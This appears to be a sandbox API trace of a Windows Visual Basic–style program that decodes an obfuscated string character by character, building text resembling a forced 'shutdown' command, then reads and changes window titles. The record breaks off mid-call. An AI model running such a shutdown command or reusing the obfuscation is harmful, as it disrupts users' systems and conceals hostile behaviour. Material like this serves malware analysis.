[0180.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0180.634] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.635] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0180.635] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.636] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.636] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0180.636] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.636] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.636] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.637] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0180.637] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.637] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.637] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.638] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0180.638] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.638] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.638] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.638] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0180.639] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.639] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.639] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.639] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0180.639] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.640] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.640] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.640] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0180.640] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.641] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.641] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.641] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0180.641] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.642] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.642] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0180.642] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.643] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0180.643] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.643] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.644] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0180.644] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.644] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.644] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0180.644] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.645] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.645] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0180.645] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.646] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.646] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0180.646] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.647] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.647] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.647] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0180.647] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.648] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.648] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0180.649] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.650] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.650] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0180.650] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.650] GetForegroundWindow () returned 0x20086 [0180.650] GetLastError () returned 0x0 [0180.651] SysStringLen (param_1=" ") returned 0xff [0180.651] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0180.651] SysStringLen (param_1=" ") returned 0xff [0180.651] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0180.651] GetWindowTextA (in: hWnd=0x20086, lpString=0x11644c4, nMaxCount=255 | out: lpString="Program Manager") returned 15 [0180.651] GetLastError () returned 0x0 [0180.651] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0180.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0180.652] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0180.652] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Program Manager") returned 256 [0180.652] SysStringLen (param_1="Pro") returned 0x3 [0180.652] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Pro", cchWideChar=4, lpMultiByteStr=0x11684fc, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Pro", lpUsedDefaultChar=0x0) returned 4 [0180.652] SetWindowTextA (hWnd=0x103c4, lpString="Pro") returned 1 [0180.652] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x5 [0180.653] GetFocus () returned 0x0 [0180.653] lstrlenA (lpString="Pro") returned 3 [0180.653] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x11684fc) returned 0x1 [0180.653] IsWindow (hWnd=0x103c4) returned 1 [0180.653] IsWindow (hWnd=0x103c4) returned 1 [0180.654] IsWindow (hWnd=0x103c4) returned 1 [0180.654] IsWindow (hWnd=0x103c4) returned 1 [0180.654] GetFocus () returned 0x0 [0180.654] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0180.655] GetFocus () returned 0x0 [0180.655] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x4) returned 0x10ebcd0 [0180.655] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x4, lParam=0x10ebcd0) returned 0x3 [0180.655] GetFocus () returned 0x0 [0180.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Pro", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0180.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Pro", cbMultiByte=-1, lpWideCharStr=0x11684fc, cchWideChar=4 | out: lpWideCharStr="Pro") returned 4 [0180.655] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0180.655] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0180.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.657] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0180.657] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.657] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="I", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="I") returned 1 [0180.658] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="[", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.658] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="N", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="N") returned 1 [0180.659] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.659] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.659] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="D", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="D") returned 1 [0180.659] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.660] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.660] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="O", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="O") returned 1 [0180.660] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.661] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.661] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0180.661] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.662] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.662] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0180.662] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.663] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0180.663] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.711] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0180.712] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.712] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0180.713] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.713] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0180.714] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.714] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.714] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0180.715] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.715] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0180.716] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.716] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0180.716] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 